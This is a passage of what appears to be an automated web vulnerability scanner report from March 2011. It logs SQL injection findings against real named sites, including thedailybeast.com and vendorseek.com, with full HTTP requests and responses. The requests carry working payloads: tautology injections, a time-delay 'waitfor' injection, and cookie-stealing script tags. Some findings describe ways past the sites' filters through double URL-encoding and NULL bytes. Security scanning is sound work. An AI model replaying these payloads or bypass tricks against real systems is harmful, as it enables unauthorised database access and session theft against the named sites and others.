Content-Type: text/html
Content-Length: 44620

<html>
<head>
<title>TheCounter.com - The Affordable Web Site Analysis Tool</title>
<!-- test test -->

<LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css">
<meta http-equiv="Content-Type" con
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=658843/658839/658829/658828/581034;s=10669;x=3584;f=1135051107;u=j;z=20110318122908" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=658843/658839/658829/658828/581034;s=10669;x=3584;f=1135051107;u=j;z=20110318122908" alt="Click here"></a>
</noscript>

</center>
</td>
</tr>
<tr bgcolor="#003163" valign="bottom">
<td width="357" rowspan="2"><img src="/img/logo_counter.gif" width="319" height="61" usemap="#counter" border="0" alt="the counter.com"><map name="counter"><area shape="rect" coords="10,20,273,54" href="http://www.thecounter.com"></map><img src="/img/counterfill.gif" width="38" height="61" alt="-"></td>
<td align="right" valign="middle"><a href="http://www.internet.com"><img src="/img/icomlogo.gif" width="132" height="20" vspace="5" hspace="5" border="0" alt="internet.com"></a></td>
</tr>
<tr bgcolor="#003163" valign="bottom">
<td align="left"><img src="/img/tabs_top_off.gif" width="423" height="18" border="0" alt="Top Navigation" vspace="0" hspace="0" usemap="#tabtop"><map name="tabtop"><area shape="polygon" coords="258, 1, 276, 16, 341, 16, 324, 1, 258, 1" href="http://www.internet.com/mediakit/"><area shape="polygon" coords="183, 1, 200, 16, 273, 16, 256, 1, 183, 1" href="http://www.TheCounter.com/help.php"><area shape="polygon" coords="89, 1, 106, 16, 196, 16, 180, 1, 89, 1" href="http://www.TheCounter.com/stats/"><area shape="polygon" coords="0, 16, 102, 16, 86, 1, 0, 1, 0, 16" href="http://www.internet.com/corporate/privacy/privacypolicy.html"></map></td>
</tr>
<tr>
<td valign="top"><img src="/img/tabs_bot_off.gif" width="358" height="14" usemap="#bottomtool" alt="Account Management Navigation" border="0"><map name="bottomtool"><area shape="polygon" coords="287, 13, 301, 0, 347, 0, 333, 13, 287, 13" href="http://www.TheCounter.com/login.php"><area shape="polygon" coords="182, 13, 195, 0, 297, 0, 285, 13, 182, 13" href="http://www.TheCounter.com/del_account.php"><area shape="polygon" coords="80, 13, 95, 0, 193,
...[SNIP]...

Request 2

GET /?6955f--%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.thecounter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=19067695'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:29:08 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 44610

<html>
<head>
<title>TheCounter.com - The Affordable Web Site Analysis Tool</title>
<!-- test test -->

<LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css">
<meta http-equiv="Content-Type" con
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=658843/658839/658829/658828/581034;s=10669;x=3584;f=556143864;u=j;z=20110318122908" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=658843/658839/658829/658828/581034;s=10669;x=3584;f=556143864;u=j;z=20110318122908" alt="Click here"></a>
</noscript>

</center>
</td>
</tr>
<tr bgcolor="#003163" valign="bottom">
<td width="357" rowspan="2"><img src="/img/logo_counter.gif" width="319" height="61" usemap="#counter" border="0" alt="the counter.com"><map name="counter"><area shape="rect" coords="10,20,273,54" href="http://www.thecounter.com"></map><img src="/img/counterfill.gif" width="38" height="61" alt="-"></td>
<td align="right" valign="middle"><a href="http://www.internet.com"><img src="/img/icomlogo.gif" width="132" height="20" vspace="5" hspace="5" border="0" alt="internet.com"></a></td>
</tr>
<tr bgcolor="#003163" valign="bottom">
<td align="left"><img src="/img/tabs_top_off.gif" width="423" height="18" border="0" alt="Top Navigation" vspace="0" hspace="0" usemap="#tabtop"><map name="tabtop"><area shape="polygon" coords="258, 1, 276, 16, 341, 16, 324, 1, 258, 1" href="http://www.internet.com/mediakit/"><area shape="polygon" coords="183, 1, 200, 16, 273, 16, 256, 1, 183, 1" href="http://www.TheCounter.com/help.php"><area shape="polygon" coords="89, 1, 106, 16, 196, 16, 180, 1, 89, 1" href="http://www.TheCounter.com/stats/"><area shape="polygon" coords="0, 16, 102, 16, 86, 1, 0, 1, 0, 16" href="http://www.internet.com/corporate/privacy/privacypolicy.html"></map></td>
</tr>
<tr>
<td valign="top"><img src="/img/tabs_bot_off.gif" width="358" height="14" usemap="#bottomtool" alt="Account Management Navigation" border="0"><map name="bottomtool"><area shape="polygon" coords="287, 13, 301, 0, 347, 0, 333, 13, 287, 13" href="http://www.TheCounter.com/login.php"><area shape="polygon" coords="182, 13, 195, 0, 297, 0, 285, 13, 182, 13" href="http://www.TheCounter.com/del_account.php"><area shape="polygon" coords="80, 13, 95, 0, 193, 0
...[SNIP]...
1.139. http://www.thedailybeast.com/author/lloyd-grove/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thedailybeast.com
Path:   /author/lloyd-grove/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload 14879953'%20or%201%3d1--%20 was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /author/lloyd-grove14879953'%20or%201%3d1--%20/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Fri, 18 Mar 2011 16:29:25 GMT
Content-Length: 10642
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<!-- SELECT t1.name from tags t1, tags_to_items tti
                    WHERE tti.items_id =
                    AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7' at line 3 -->
...[SNIP]...
1.140. http://www.thedailybeast.com/author/lloyd-grove/'"--> [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thedailybeast.com
Path:   /author/lloyd-grove/'"--></style></script><script>alert(document.cookie)</script>

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload 43847644'%20or%201%3d1--%20 was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /author/lloyd-grove43847644'%20or%201%3d1--%20/'"--></style></script><script>alert(document.cookie)</script> HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Fri, 18 Mar 2011 16:29:23 GMT
Content-Length: 10703
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<!-- SELECT t1.name from tags t1, tags_to_items tti
                    WHERE tti.items_id =
                    AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7' at line 3 -->
...[SNIP]...
1.142. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [&CCID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The &CCID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the &CCID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie' HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:39:08 GMT
Server: Microsoft-IIS/6.0
Content-Length: 11360
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=GCABGAJBDFMPNPDENFCBOPPJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...
1.143. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [&CCID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The &CCID parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the &CCID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503%2527&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:34:39 GMT
Server: Microsoft-IIS/6.0
Content-Length: 14344
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=KIOAGAJBCHLLBCCDPEOLJEAA; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...
1.144. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [CLK parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The CLK parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CLK parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818%00'&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 25 Mar 2011 16:54:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 17449
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSASBQADT=ILMPINCCIPFLIKDEPEIMHFOB; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

Request 2

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818%00''&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 16:54:35 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31819
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSASBQADT=HNMPINCCJKNGCCMLMOABADJG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
1.145. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [QTR parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The QTR parameter appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the QTR parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ',0,0,0)waitfor%20delay'0%3a0%3a20'--&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:37:06 GMT
Server: Microsoft-IIS/6.0
Content-Length: 6359
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=PHPAGAJBAPLILNDALOLMMLOC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...
1.146. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q="

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:37:30 GMT
Server: Microsoft-IIS/6.0
Content-Length: 17602
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=MHPAGAJBAHHKEJHBLHEPAJFA; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...
1.147. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload 75850100'%20or%201%3d1--%20 was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)75850100'%20or%201%3d1--%20
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:34:39 GMT
Server: Microsoft-IIS/6.0
Content-Length: 6087
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=EJOAGAJBDJPDLLJKGCMMOGMB; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...
1.148. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 25 Mar 2011 16:52:08 GMT
Server: Microsoft-IIS/6.0
Content-Length: 3534
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSASBQADT=ECMPINCCIEFEOIDFDDKPBLBC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

Request 2

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 16:52:25 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31819
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSASBQADT=ADMPINCCMJAMDOOMANDHJIDK; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
1.149. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?1'=1 HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:33:00 GMT
Server: Microsoft-IIS/6.0
Content-Length: 5186
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=JINAGAJBNPNBGICGPPNMFEAN; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

Request 2

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?1''=1 HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Mar 2011 16:33:23 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31819
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=OLNAGAJBBJMCJOKKNMHGOIGO; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
